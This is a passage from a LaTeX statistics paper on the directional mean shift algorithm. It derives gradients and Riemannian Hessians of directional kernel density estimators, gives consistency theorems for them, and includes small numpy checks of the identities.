\includegraphics[width=0.7\linewidth]{Figures/MS_One_Step_1.pdf}
\caption{Illustration of one-step iteration of Algorithm \ref{Algo:MS}}
\label{fig:MS_One_Step}
\end{figure}
Analogous to the mean shift algorithm with Euclidean data, Algorithm \ref{Algo:MS} can be leveraged for mode seeking and clustering with directional data.
We derive statistical and computational learning theory for mode seeking in Sections \ref{Sec:grad_Hess_consist} and \ref{Sec:Algo_conv}.
For clustering, we demonstrate with both simulated and real-world data sets that the algorithm can be used to cluster directional data in Section~\ref{Sec:Experiments}.
It should also be noted that the directional mean shift algorithm can be viewed as a gradient ascent method on $\Omega_q$ with an adaptive step size; see Section~\ref{sec:linear} for details.
More importantly, similar to the standard mean shift algorithm with Euclidean data, the directional mean shift algorithm has several advantages over a regular gradient ascent method.
First, the directional mean shift algorithm requires no tuning of the step size parameter, yet exhibits mathematical simplicity when it is written as the fixed-point iteration \eqref{fix_point_eq}. Second, the algorithm does not need to estimate the normalizing constant $c_{h,q}(L)$ of the directional KDE in its application. Specifically, in order to identify local modes of the directional KDE using our algorithm, it is only necessary to specify the directional kernel $L$ up to a constant. This avoids additional computational cost in estimating the normalizing constant $c_{h,q}(L)$ for the kernel, because the constant $c_{h,q}(L)$ often involves complicated functions for high dimensional directional data. For instance, estimating the normalizing constant of the von Mises kernel involves an approximation of a modified Bessel function of the first kind, though several efficient algorithms have been developed; see, for instance, \cite{Sra2011}.
\section{Statistical Learning Theory of Directional KDE and its Derivatives}
\label{Sec:grad_Hess_consist}
Because the (directional) mean shift algorithm is inspired by a gradient ascent method, we study the gradients and Hessians of the two estimators $\hat f_h$ and $\tilde f_h$.
\subsection{Gradient and Hessian of Directional KDEs}
\label{Sec:grad_Hess_Dir}
We have demonstrated that the two directional KDEs (\ref{Dir_KDE}) and (\ref{Dir_KDE2}) coincide on $\Omega_q$, so either can be used to estimate the true directional density $f$.
Somewhat surprisingly, the corresponding total gradients are different in general. The total gradient of $\tilde f_h$ is
\begin{equation}
\label{Dir_KDE_grad1}
\nabla \tilde{f}_h(\bm{x}) = \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n (\bm{x} -\bm{X}_i) \cdot L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right),
\end{equation}
while the total gradient of $\hat{f}_h$ is
\begin{equation}
\label{Dir_KDE_grad2}
\nabla \hat{f}_h(\bm{x}) = -\frac{c_{h,q}(L)}{nh^2} \sum\limits_{i=1}^n \bm{X}_i L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right).
\end{equation}
Although the total gradients $\nabla \tilde{f}_h$ and $\nabla \hat{f}_h$ have different values even on $\Omega_q$, they both play a vital role in the directional mean shift algorithm (Algorithm~\ref{Algo:MS}). On the one hand, we have argued in Section \ref{Sec:MS_Dir} that $\nabla \tilde{f}_h(\bm{x})$ has a similar decomposition as the total gradient of the Euclidean KDE, and derived Algorithm~\ref{Algo:MS} based on $\nabla \tilde{f}_h(\bm{x})$. On the other hand, given the form of $\nabla \hat{f}_h(\bm{x})$ in \eqref{Dir_KDE_grad2}, the fixed-point equation \eqref{fix_point_eq} in Algorithm~\ref{Algo:MS} can be written as
\begin{equation}
\label{fix_point_grad}
\hat{\bm{y}}_{s+1} = \frac{\nabla \hat{f}_h(\hat{\bm{y}}_s)}{\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2}.
\end{equation}
As argued in Section \ref{Diff_Geo_Review} and \eqref{radial}, any total gradient at $\bm{x} \in \Omega_q$ can be decomposed into radial and tangent components. Therefore, the total gradient $\nabla \tilde{f}_h(\bm{x})$ is decomposed as
\begin{align*}
\nabla \tilde{f}_h(\bm{x}) &= \bm{x}\bm{x}^T \nabla \tilde{f}_h(\bm{x}) + \left(I_{q+1} - \bm{x}\bm{x}^T \right)\nabla \tilde{f}_h(\bm{x})\\
&= \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n \bm{x} \left(1 -\bm{x}^T\bm{X}_i \right) L'\left(\frac{1 -\bm{x}^T \bm{X}_i}{h^2} \right)\\
&\quad + \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n \left(\bm{x} \cdot \bm{x}^T \bm{X}_i - \bm{X}_i \right) L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right)\\
&\equiv \mathtt{Rad}\left(\nabla \tilde{f}_h(\bm{x}) \right) + \mathtt{Tang}\left(\nabla \tilde{f}_h(\bm{x}) \right),
\end{align*}
where $\mathtt{Rad}$ and $\mathtt{Tang}$ are the radial and tangent components of the total gradient, as in \eqref{radial} and \eqref{tangent}. Similarly, we decompose $\nabla \hat{f}_h(\bm{x})$ as
\begin{align*}
\nabla \hat{f}_h(\bm{x}) &= \bm{x}\bm{x}^T \nabla \hat{f}_h(\bm{x}) + \left(I_{q+1} -\bm{x}\bm{x}^T \right) \nabla \hat{f}_h(\bm{x})\\
&= -\frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n \bm{x}\bm{x}^T\bm{X}_i \cdot L'\left(\frac{1 -\bm{x}^T \bm{X}_i}{h^2} \right) \\
&\quad + \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n \left(\bm{x} \cdot \bm{x}^T \bm{X}_i - \bm{X}_i \right) \cdot L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right)\\
&\equiv \mathtt{Rad}\left(\nabla \hat{f}_h(\bm{x}) \right) + \mathtt{Tang}\left(\nabla \hat{f}_h(\bm{x}) \right).
\end{align*}
Therefore, the difference between the two total gradients $\nabla \tilde{f}_h(\bm{x})$ and $\nabla \hat{f}_h(\bm{x})$ is
\begin{equation}
\label{tot_grad_diff}
\nabla \tilde{f}_h(\bm{x}) - \nabla \hat{f}_h(\bm{x}) = \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n L'\left(\frac{1 -\bm{x}^T \bm{X}_i}{h^2} \right) \cdot \bm{x},
\end{equation}
which is parallel to the radial direction $\bm{x}$. This implies that given kernel $L$, the Riemannian gradients of the two estimators are the same, that is,
\begin{align}
\label{tang_grad}
\begin{split}
\mathtt{grad}\, \hat{f}_h(\bm{x}) \equiv \mathtt{Tang}\left(\nabla \hat{f}_h(\bm{x}) \right) &= \nabla \hat{f}_h(\bm{x}) - \left[\bm{x}^T \nabla \hat{f}_h(\bm{x}) \right]\cdot \bm{x}\\
&= \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n \left(\bm{x}^T \bm{X}_i \cdot \bm{x} - \bm{X}_i \right) \cdot L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right)\\
&=\mathtt{grad}\, \tilde{f}_h(\bm{x}) \equiv \mathtt{Tang}\left(\nabla \tilde{f}_h(\bm{x}) \right).
\end{split}
\end{align}
Later, we demonstrate in Theorems \ref{pw_conv_tang} and \ref{unif_conv_tang} that the Riemannian gradients of $\hat f_h$ and $\tilde f_h$ are consistent estimators of the Riemannian gradient of the underlying density $f$ that generates directional data. One can also deduce the same fixed-point equation \eqref{fix_point_eq} (or equivalently \eqref{fix_point_grad}) from the Riemannian/tangent gradient estimator $\mathtt{grad}\, \hat{f}_h(\bm{x})\equiv \mathtt{Tang}\left(\nabla \hat{f}_h(\bm{x}) \right)$, although the assumption on the directional estimated density $\hat{f}_h$ is stricter. See Appendix~\ref{Appendix:Tang_MS_DR} for detailed derivations.
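A quick numerical sanity check of \eqref{tang_grad} and \eqref{tot_grad_diff}: with the von Mises kernel $L(r)=e^{-r}$, both total gradients are available in closed form (the common factor $c_{h,q}(L)/n$ is dropped from both), and projecting them onto the tangent space $T_{\bm x}$ yields the same vector even though the unprojected total gradients differ.

```python
import numpy as np

rng = np.random.default_rng(3)
Z = rng.normal(size=(100, 3))
X = Z / np.linalg.norm(Z, axis=1, keepdims=True)
h = 0.4

def grad_tilde(x):
    # total gradient of tilde f_h (von Mises kernel), up to c_{h,q}(L)/n:
    # -(1/h^2) * sum_i (x - X_i) exp(-||x - X_i||^2 / (2 h^2))
    w = np.exp(-0.5 * np.sum((x - X)**2, axis=1) / h**2)
    return (w @ X - w.sum() * x) / h**2

def grad_hat(x):
    # total gradient of hat f_h, up to the same constant:
    # (1/h^2) * sum_i X_i exp(-(1 - x^T X_i) / h^2)
    w = np.exp((X @ x - 1.0) / h**2)
    return (w @ X) / h**2

x = np.array([0.0, 0.0, 1.0])
P = np.eye(3) - np.outer(x, x)   # projection onto the tangent space T_x
print(np.allclose(P @ grad_tilde(x), P @ grad_hat(x)))  # Riemannian gradients agree
print(np.allclose(grad_tilde(x), grad_hat(x)))          # total gradients do not
```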
Having demonstrated that the Riemannian gradients of $\tilde f_h$ and $\hat f_h$ are identical, we now study the Riemannian Hessians of $\tilde f_h$ and $\hat f_h$.
By \eqref{Hess_Dir}, the Riemannian Hessian of $\hat f_h$ is associated with the total gradient operator $\nabla$ via
\begin{equation}
\label{Hess_est}
\mathcal{H} \hat f_h(\bm x) = (I_{q+1} - \bm{x}\bm{x}^T) \left[\nabla\nabla \hat f_h(\bm{x}) - \nabla \hat f_h(\bm{x})^T \bm{x} I_{q+1} \right](I_{q+1} - \bm{x}\bm{x}^T)
\end{equation}
and similarly for $\mathcal{H} \tilde f_h(\bm x)$. The following lemma shows that when a directional kernel $L$ is smooth, the two Riemannian Hessians are identical.
\begin{lemma}
\label{lem:Hessian}
Assume that kernel $L$ is twice continuously differentiable.
Then,
$$\mathcal{H}\tilde f_h(\bm x)=\mathcal{H}\hat f_h(\bm x)$$
for any point $\bm{x}\in\Omega_q$.
\end{lemma}
The proof of Lemma~\ref{lem:Hessian} can be found in Appendix~\ref{Appendix:lem1_pf}. As a result, we can compute the Riemannian Hessian estimator at point $\bm{x}\in \Omega_q$
based on either $ \tilde{f}_h(\bm{x})$ or $ \hat{f}_h(\bm{x})$, which will produce the same expression.
Later, in Theorems \ref{pw_conv_tang} and \ref{unif_conv_tang}, we demonstrate that $\mathcal{H} \hat{f}_h(\bm x)$ is a (uniformly) consistent estimator of $\mathcal{H} f(\bm x)$ defined in (\ref{Hess_Dir}).
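Lemma~\ref{lem:Hessian} can likewise be verified numerically. With the von Mises kernel $L(r)=e^{-r}$, the total Hessians of $\hat f_h$ and $\tilde f_h$ have simple closed forms (again dropping the common factor $c_{h,q}(L)/n$), and plugging them into \eqref{Hess_est} yields identical Riemannian Hessians at any $\bm x \in \Omega_q$.

```python
import numpy as np

rng = np.random.default_rng(4)
Z = rng.normal(size=(80, 3))
X = Z / np.linalg.norm(Z, axis=1, keepdims=True)
h, q = 0.4, 2
I = np.eye(q + 1)

def riem_hess(x, grad, hess):
    """Riemannian Hessian via (Hess_est): P [HH - (grad . x) I] P."""
    P = I - np.outer(x, x)
    return P @ (hess - (grad @ x) * I) @ P

x = np.array([0.0, 0.0, 1.0])
w = np.exp((X @ x - 1.0) / h**2)   # exp(-r_i); identical for both forms on the sphere

# hat f_h: grad = (1/h^2) sum_i w_i X_i, total Hessian = (1/h^4) sum_i w_i X_i X_i^T
g_hat = (w @ X) / h**2
H_hat = (X.T * w) @ X / h**4

# tilde f_h: grad and total Hessian of sum_i exp(-||x - X_i||^2 / (2 h^2))
D = x - X
g_til = -(D.T @ w) / h**2
H_til = (D.T * w) @ D / h**4 - w.sum() * I / h**2

print(np.allclose(riem_hess(x, g_hat, H_hat), riem_hess(x, g_til, H_til)))
```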
\subsection{Assumptions}
\label{Sec:Consist_Assump}
To apply the total gradient operator $\nabla$ to a directional density $f$ that generates data, we extend it from $\Omega_q$ to $\mathbb{R}^{q+1} \setminus\{\bm{0}\}$ by defining $f(\bm{x}) \equiv f\left(\frac{\bm{x}}{||\bm{x}||_2} \right)$ for all $\bm{x}\in \mathbb{R}^{q+1} \setminus \{\bm{0} \}$. In this extension, we assume that the total gradient $\nabla f(\bm{x}) = \left(\frac{\partial f(\bm{x})}{\partial x_1},..., \frac{\partial f(\bm{x})}{\partial x_{q+1}} \right)^T$ and total Hessian matrix $\nabla\nabla f(\bm{x}) = \left(\frac{\partial^2 f(\bm{x})}{\partial x_i \partial x_j} \right)_{1\leq i,j \leq q+1}$ in $\mathbb{R}^{q+1}$ exist, and are continuous on $\mathbb{R}^{q+1} \setminus \{\bm{0} \}$ and square integrable on $\Omega_q$.
This extension has also been used by \cite{Zhao2001,Dir_Linear2013,Exact_Risk_bw2013}.
Note that the Riemannian gradient and Hessian are invariant under this extension.
To establish the consistency results of gradient and Hessian estimators (cf. \eqref{tang_grad} and \eqref{Hess_est} or \eqref{Hess_KDE} in its explicit form), we consider the following assumptions.
\begin{itemize}
\item {\bf (D1)} Assume that the extended density function $f$ is at least three times continuously differentiable on $\mathbb{R}^{q+1}\setminus \left\{\bm{0}\right\}$ and that its derivatives are square integrable on $\Omega_q$.
\item {\bf (D2)} Assume that $L: [0,\infty) \to [0,\infty)$ is a bounded and Riemann integrable function such that
$$0< \int_0^{\infty} L^k(r) r^{\frac{q}{2}-1} dr < \infty$$
for all $q\geq 1$ and $k=1,2$.
\item {\bf (D2')} Under (D2), we further assume that $L$ is a twice continuously differentiable function on $(-\delta_L,\infty) \subset \mathbb{R}$ for some constant $\delta_L>0$ such that
$$0< \int_0^{\infty} L'(r)^k r^{\frac{q}{2}-1} dr < \infty, \quad 0< \int_0^{\infty} L''(r)^k r^{\frac{q}{2}-1} dr < \infty$$
for all $q\geq 1$ and $k=1,2$.
\end{itemize}
Here, conditions (D1) and (D2) are required for the consistency of the directional KDE \citep{KDE_Sphe1987,KLEMELA2000,Zhao2001,Dir_Linear2013,Exact_Risk_bw2013}. The stronger condition (D2') is imposed for the consistency of Riemannian gradient estimator $\mathtt{grad}\, \hat{f}_h(\bm{x}) \equiv \mathtt{Tang}\left(\nabla \hat{f}_h(\bm{x}) \right)$ and Hessian estimator $\mathcal{H} \hat{f}_h(\bm x)$.
The differentiability condition in (D2') can be relaxed so that $L$, after being smoothly extrapolated from $[0,\infty)$ to $(-\delta_L,\infty)$ for some constant $\delta_L >0$, is (twice) continuously differentiable except for a set of points with Lebesgue measure $0$ on $(-\delta_L,\infty)$.
One can justify via integration by parts that many commonly used kernels, such as the von-Mises kernel $L(r)=e^{-r}$ or compactly supported kernels, satisfy condition (D2').
Under conditions (D1) and (D2), the pointwise convergence rate of $\hat f_h$ is
$$\hat{f}_h(\bm{x}) - f(\bm{x}) = O(h^2) + O_P\left(\sqrt{\frac{1}{nh^q}} \right);$$
see, for instance, \cite{KDE_Sphe1987, Zhao2001,Exact_Risk_bw2013, Dir_Linear2013}.
Moreover, \cite{KDE_direct1988} used a piecewise constant kernel function to approximate the given kernel $L$ and derived the uniform convergence rate as
\begin{equation}
\label{Dir_KDE_unif_conv}
\|\hat{f}_h- f\|_{\infty}= \sup_{\bm{x}\in \Omega_q} \left|\hat{f}_h(\bm{x}) -f(\bm{x}) \right| = O(h^2) + O_P\left(\sqrt{\frac{\log n}{nh^q}} \right).
\end{equation}
One can also prove the uniform consistency of the directional KDE by slightly modifying the techniques in \cite{Gine2002} and \cite{Einmahl2005} for the consistency of the usual Euclidean KDE.
We will leverage these techniques in our proofs of the uniform convergence rates of the Riemannian gradient and Hessian estimators.
\subsection{Pointwise Consistency}
Our derivations of the pointwise convergence rates of the (Riemannian) gradient and Hessian estimators of the directional KDE $\hat{f}_h$ are analogous to the arguments for the usual Euclidean KDE \citep{Silverman1986,Scott2015}, which rely on Taylor's expansion. The difference in the directional KDE case is that the integrals are taken over the Lebesgue measure $\omega_q$ on $\Omega_q$ when we compute the expectations $\mathbb{E}\left[\mathtt{grad}\, \hat{f}_h(\bm{x}) \right]$ and $\mathbb{E}\left[\mathcal{H} \hat{f}_h(\bm x) \right]$. The key argument for evaluating directional integrals is the following change-of-variable formula
$$\omega_q(d\bm{x}) = (1-t^2)^{\frac{q}{2}-1} dt\, \omega_{q-1}(d\bm{\xi}),$$
where $t=\bm{x}^T\bm{y}$ for a fixed point $\bm{y}\in \Omega_q$ and $\bm{\xi} \in \Omega_q$ is a unit vector orthogonal to $\bm{y}$. The formula is proved in Lemma 2 of \cite{Dir_Linear2013} and on pages 91-93 in \cite{Sphe_Harm} in two different ways. The surface area of $\Omega_q$ in (\ref{surf_area}) easily follows from this formula.
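As a sanity check, the change-of-variable formula implies the recursion $\omega_q = \omega_{q-1} \int_{-1}^1 (1-t^2)^{\frac{q}{2}-1}\, dt$ for surface areas, which the snippet below confirms numerically for $q=2,3,4$ against the closed form $\omega_q = 2\pi^{\frac{q+1}{2}}/\Gamma\left(\frac{q+1}{2}\right)$ (here $\omega_q$ also denotes the surface area of $\Omega_q$).

```python
import numpy as np
from math import pi, gamma

def surface_area(q):
    # Closed form: omega_q = 2 pi^{(q+1)/2} / Gamma((q+1)/2)
    return 2.0 * pi ** ((q + 1) / 2) / gamma((q + 1) / 2)

# Integrating out t = x^T y via the change of variables gives
# omega_q = omega_{q-1} * int_{-1}^{1} (1 - t^2)^{q/2 - 1} dt.
t = np.linspace(-1.0, 1.0, 200001)
dt = t[1] - t[0]
for q in (2, 3, 4):
    vals = (1.0 - t**2) ** (q / 2 - 1)
    integral = dt * (vals.sum() - 0.5 * (vals[0] + vals[-1]))  # trapezoidal rule
    print(q, np.isclose(surface_area(q - 1) * integral, surface_area(q), rtol=1e-4))
```

For instance, $q=2$ gives $\omega_1 \cdot 2 = 4\pi$ and $q=3$ gives $\omega_2 \cdot \frac{\pi}{2} = 2\pi^2$, as expected.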
With this formula, we have the following convergence results.
\begin{theorem}
\label{pw_conv_tang}
Assume conditions (D1) and (D2').
For any fixed $\bm{x}\in \Omega_q$, we have
$$\mathtt{grad}\, \hat{f}_h(\bm{x})- \mathtt{grad}\, f(\bm{x}) = O(h^2) + O_P\left(\sqrt{\frac{1}{nh^{q+2}}} \right)$$
as $h\to 0$ and $nh^{q+2} \to \infty$.\\
Under the same condition, for any fixed $\bm{x}\in \Omega_q$, we have
$$\mathcal{H} \hat{f}_h(\bm x) - \mathcal{H} f(\bm x) = O(h^2) + O_P\left(\sqrt{\frac{1}{nh^{q+4}}} \right)$$
as $h\to 0$ and $nh^{q+4} \to \infty$.
\end{theorem}
The proof of Theorem~\ref{pw_conv_tang} is lengthy and deferred to Appendix~\ref{Appendix:Thm2_pf}. Theorem~\ref{pw_conv_tang} demonstrates that the Riemannian gradient of a directional KDE is a consistent estimator of the Riemannian gradient of the directional density that generates data.
A similar result holds for the Riemannian Hessian.
It cannot be claimed that the total gradients $\nabla \hat f_h$ or $\nabla \tilde f_h$ converge to $\nabla f$ since the radial component of $f$ depends on how $f$ is extended to points outside $\Omega_q$. Lemma~\ref{Rad_grad} below and the proof of Theorem~\ref{pw_conv_tang} demonstrate that the limiting behaviors of $\mathtt{Rad}\left(\nabla \hat{f}_h(\bm{x}) \right)$ and $\mathtt{Rad}\left(\nabla \tilde{f}_h(\bm{x}) \right)$ are different; the former one is of the order $O\left(h^{-2} \right) + O_P\left(\sqrt{\frac{1}{nh^{q+4}}} \right)$ while the latter one is of the order $O(1) + O_P\left(\sqrt{\frac{1}{nh^{q+2}}} \right)$.
Note that
\cite{KLEMELA2000} also derived similar convergence rates for the derivatives of a directional KDE, although the definitions of the directional KDE and its derivatives in \cite{KLEMELA2000} differ from ours and the resulting expressions are more involved.
\begin{remark}
Under some smoothness conditions \citep{Asymp_deri_KDE2011}, the pointwise convergence rates of gradient and Hessian estimators defined by the usual Euclidean KDE are
$$O(h^2) + O_P\left(\frac{1}{nh^{d+2}} \right) \quad \text{ and } \quad O(h^2) + O_P\left(\frac{1}{nh^{d+4}} \right),$$
where $d$ represents the dimension of the Euclidean data. Therefore, our pointwise consistency results for the Riemannian gradient and Hessian of the directional KDE in Theorem~\ref{pw_conv_tang} align with the pointwise convergence rates of the usual Euclidean KDE, in the sense that the dimension $d$ is replaced by the (intrinsic) manifold dimension $q$ of directional data.
\end{remark}
\subsection{Uniform Consistency}
We now strengthen the convergence results in Theorem \ref{pw_conv_tang} to uniform convergence rates with the assumptions and techniques developed by \cite{Gine2002} and \cite{Einmahl2005}.
Let $[\tau]=(\tau_1,...,\tau_{q+1})$ be a multi-index (that is, $\tau_1,...,\tau_{q+1}$ are non-negative integers and $|[\tau]|=\sum\limits_{j=1}^{q+1} \tau_j$). Define $D^{[\tau]} = \frac{\partial^{\tau_1}}{\partial x_1^{\tau_1}} \cdots \frac{\partial^{\tau_{q+1}}}{\partial x_{q+1}^{\tau_{q+1}}}$ as the $|[\tau]|$-th order partial derivative operator.
Given the directional KDE in \eqref{Dir_KDE2}, we define the following function class of the kernel function $L$ and its partial derivatives as
$$\mathcal{K} = \left\{ \bm{u}\mapsto K\left(\frac{\bm{z}-\bm{u}}{h} \right): \bm{u}, \bm{z}\in \Omega_q, h>0, K(\bm{x}) = D^{[\tau]} L\left(\frac{1}{2}||\bm{x}||_2^2 \right), |[\tau]|=0,1,2 \right\}.$$
Under condition (D2'), $\mathcal{K}$ is a collection of bounded measurable functions on $\Omega_q$. To guarantee the uniform consistency of the directional KDE itself as well as its (Riemannian) gradient and Hessian, we assume the following:
\begin{itemize}
\item {\bf (K1)} $\mathcal{K}$ is a bounded VC (subgraph) class of measurable functions on $\Omega_q$, that is, there exist constants $A,\vartheta >0$ such that for any $0 < \epsilon <1$,
$$\sup_Q N\left(\mathcal{K}, L_2(Q), \epsilon ||F||_{L_2(Q)} \right) \leq \left(\frac{A}{\epsilon} \right)^{\vartheta},$$
where $N(T,d_T,\epsilon)$ is the $\epsilon$-covering number of the pseudometric space $(T,d_T)$, $Q$ is any probability measure on $\Omega_q$, and $F$ is an envelope function of $\mathcal{K}$. The constants $A$ and $\vartheta$ are usually called the VC (Vapnik-Chervonenkis) characteristics of $\mathcal{K}$ and the norm $||F||_{L_2(Q)}$ is defined as $\left[\int_{\Omega_q} |F(\bm{x})|^2 dQ(\bm{x}) \right]^{\frac{1}{2}}$.
\end{itemize}
Given the differentiability of kernel $L$ guaranteed by (D2'), we can take $F$ as a constant envelope function
$$C_{\mathcal{K}} = \sup_{\bm{x}\in \mathbb{R}^{q+1}, |[\tau]|=0,1,2} \left|D^{[\tau]} L\left(\frac{1}{2}||\bm{x}||_2^2 \right) \right|$$
when it is finite.
Condition (K1) is not stringent in practice and can be satisfied by many kernel functions, such as the von-Mises kernel $L(r)=e^{-r}$ and many compactly supported kernels on $[0,\infty)$. For these kernel options, the resulting function class $\mathcal{K}$ comprises only functions of the form $\bm{u} \mapsto \Phi\left(|\bm{A}\bm{u}+\bm{b}| \right)$, where $\Phi$ is a real-valued function of bounded variation on $[0,\infty)$, $\bm{A}$ ranges over matrices in $\mathbb{R}^{(q+1)\times (q+1)}$, and $\bm{b}$ ranges over $\mathbb{R}^{q+1}$. Thus, $\mathcal{K}$ is of VC (subgraph) class by Lemma 22 in \cite{Nolan1987}.
Under conditions (D1), (D2'), and (K1), the uniform consistency results for the directional KDE (restated) as well as its Riemannian gradient and Hessian estimators are summarized in the following theorem, whose proof can be found in Appendix~\ref{Appendix:Thm4_pf}.
\begin{theorem}
\label{unif_conv_tang}
Assume (D1), (D2'), and (K1). The uniform convergence rate of $\hat{f}_h$ is given by
$$\sup_{\bm x \in\Omega_q}|\hat{f}_h(\bm x) -f(\bm x)| = O(h^2) + O_P\left(\sqrt{\frac{|\log h|}{nh^q}} \right)$$
as $h\to 0$ and $\frac{nh^q}{|\log h|} \to \infty$. \\
Furthermore, the uniform convergence rate of $\mathtt{grad}\, \hat{f}_h(\bm{x})$ on $\Omega_q$ is
$$\sup_{\bm x\in\Omega_q}\norm{\mathtt{grad}\, \hat{f}_h (\bm x)- \mathtt{grad}\, f(\bm x) }_{\max} = O(h^2) + O_P\left(\sqrt{\frac{|\log h|}{nh^{q+2}}} \right),
$$
as $h\to 0$ and $\frac{nh^{q+2}}{|\log h|} \to \infty$.
Finally, the uniform convergence rate of $\mathcal{H} \hat{f}_h(\bm x)$ on $\Omega_q$ is
$$
\sup_{\bm{x}\in \Omega_q}\norm{\mathcal{H} \hat{f}_h(\bm x) - \mathcal{H} f(\bm x)}_{\max}
= O(h^2) + O_P\left(\sqrt{\frac{|\log h|}{nh^{q+4}}} \right),
$$
as $h\to 0$ and $\frac{nh^{q+4}}{|\log h|} \to \infty$, where $\norm{\cdot}_{\max} $ is the elementwise maximum norm for a vector in $\mathbb{R}^{q+1}$ or a matrix in $\mathbb{R}^{(q+1)\times (q+1)}$.
\end{theorem}
\begin{remark}
Theorem~\ref{unif_conv_tang} can also be generalized to higher-order derivatives.
All that is necessary is to extend the assumptions (D2') and (K1) to higher-order derivatives (projected onto the tangent direction) and to strengthen the differentiability assumptions on $f$ in (D1).
The elementwise maximum norm between the derivative estimator and the true quantity will then attain the rate
$$
O(h^2) + O_P\left(\sqrt{\frac{|\log h|}{nh^{q+2m}}}\right),
$$
where $m$ is the highest order of derivatives desired.
\end{remark}
\subsection{Mode Consistency}
\label{Sec:Mode_Const}
Consistency of estimating local modes has been established for the usual Euclidean KDE by \cite{Mode_clu2016}, where the authors demonstrated that with probability tending to 1, the number of estimated local modes is the same as the number of true local modes under appropriate assumptions. Moreover, the convergence rate of the Hausdorff distance (a common distance between two sets) between the collection of local modes and its estimator is elucidated. Here, we reproduce the consistency of estimating local modes of a directional density $f$ supported on $\Omega_q$ by the local modes of the directional KDE $\hat{f}_h$.
Given two sets $A,B \subset \Omega_q$, their Hausdorff distance is
\begin{equation}
\label{Haus_def}
\mathtt{Haus}(A,B) = \inf\left\{r>0: A\subset B \oplus r, B \subset A \oplus r \right\},
\end{equation}
where $A\oplus r =\left\{\bm{y}\in \Omega_q: \inf_{\bm{x}\in A} \norm{\bm{x}-\bm{y}}_2 \leq r \right\} = \left\{\bm{y}\in \Omega_q: \sup_{\bm{x}\in A} \bm{x}^T\bm{y} \geq 1-\frac{r^2}{2} \right\}$. The equality follows from the fact that $\norm{\bm{x}}_2^2=1$ for any $\bm{x}\in \Omega_q$.
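In code, the Hausdorff distance \eqref{Haus_def} between two finite point sets on $\Omega_q$ reduces to max-min chordal distances; the snippet below is a minimal sketch and also checks the equality $\norm{\bm{x}-\bm{y}}_2 \leq r \iff \bm{x}^T\bm{y} \geq 1-\frac{r^2}{2}$ used above.

```python
import numpy as np

def hausdorff(A, B):
    # Hausdorff distance between finite sets A, B (rows are unit vectors),
    # using the chordal (Euclidean) distance ||x - y||_2
    D = np.linalg.norm(A[:, None, :] - B[None, :, :], axis=2)
    return max(D.min(axis=1).max(), D.min(axis=0).max())

# For unit vectors, ||x - y||_2 <= r  iff  x^T y >= 1 - r^2/2:
x = np.array([0.0, 0.0, 1.0])
y = np.array([0.0, np.sin(0.3), np.cos(0.3)])
r = np.linalg.norm(x - y)
print(np.isclose(x @ y, 1.0 - r**2 / 2.0))                      # the equality
print(np.isclose(hausdorff(np.array([x]), np.array([y])), r))   # singleton sets
```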
Let $C_3$ be the upper bound for the partial derivatives of the directional density $f$ on the compact manifold $\Omega_q$ up to the third order.
Such a constant exists under condition (D1).
Let $\hat{\mathcal{M}}_n = \left\{\hat{\bm{m}}_1,...,\hat{\bm{m}}_{\hat{K}_n} \right\}$ be the collection of local modes of $\hat{f}_h$ and $\mathcal{M}=\left\{\bm{m}_1,...,\bm{m}_K \right\}$ be the collection of local modes of $f$. Here, $\hat{K}_n$ is the number of estimated local modes and $K$ is the number of true local modes. We consider the following assumptions.
\begin{itemize}
\item {\bf (M1)} There exists $\lambda_* >0$ such that
$$0 < \lambda_* \leq |\lambda_1(\bm{m}_j)|, \quad \text{ for all } j=1,...,K,$$
where $0>\lambda_1(\bm{x}) \geq \cdots \geq \lambda_q(\bm{x})$ are the $q$ smallest (negatively-largest) eigenvalues of the Riemannian Hessian $\mathcal{H} f(\bm x)$.
\item {\bf (M2)} There exist $\Theta_1,\rho_* >0$ such that
$$\left\{\bm{x}\in \Omega_q: \norm{\mathtt{Tang}(\nabla f(\bm{x}))}_{\max} \leq \Theta_1, \lambda_1(\bm{x}) \leq -\frac{\lambda_*}{2} <0 \right\} \subset \mathcal{M} \oplus \rho_*,$$
where $\lambda_*$ is defined in (M1) and $0<\rho_* < \min\left\{\sqrt{2-2\cos\left(\frac{3\lambda_*}{2C_3}\right)}, 2\right\}$.
\end{itemize}
Condition (M1) is imposed so that every local mode of $f$ is isolated from other critical points; see Lemma 3.2 in \cite{Morse_Homology2004}. The condition also guarantees that the number of local modes of $f$ supported on the compact manifold $\Omega_q$ is finite. As noted by \cite{Mode_clu2016}, condition (M1) always holds when $f$ is a Morse function on $\Omega_q$. The second condition (M2) regularizes the behavior of $f$ so that any point whose Riemannian gradient is close to $\bm{0}$ and whose Hessian $\mathcal{H} f(\bm x)$ has negative eigenvalues within the tangent space $T_{\bm{x}}$ must be close to a local mode. See the paper by \cite{Mode_clu2016} for a detailed discussion. The constant $\sqrt{2-2\cos\left(\frac{3\lambda_*}{2C_3}\right)}$ is selected so that the great-circle distance from $\bm{m}_k$ to the boundary of $\bm{m}_k \oplus \rho_*$, that is, $\arccos(\bm{m}_k^T \bm{x})$ with $\bm{x}\in \partial S_k$, is less than $\frac{3\lambda_*}{2C_3}$ for any $\bm{m}_k \in \mathcal{M}$, where $S_k=\left\{\bm{x}\in \Omega_q: \norm{\bm{x}-\bm{m}_k}_2 \leq \rho_* \right\}$ and $\partial S_k = \{\bm{x}\in \Omega_q: \norm{\bm{x}-\bm{m}_k}_2 = \rho_* \}$.
It should be emphasized that condition (M1) is a weak condition that can be satisfied by the local modes of common directional densities. We take the von Mises-Fisher density as an example. With the formula \eqref{vMF_density}, we naturally extend $f_{\text{vMF}}$ to $\mathbb{R}^{q+1}$ and deduce that
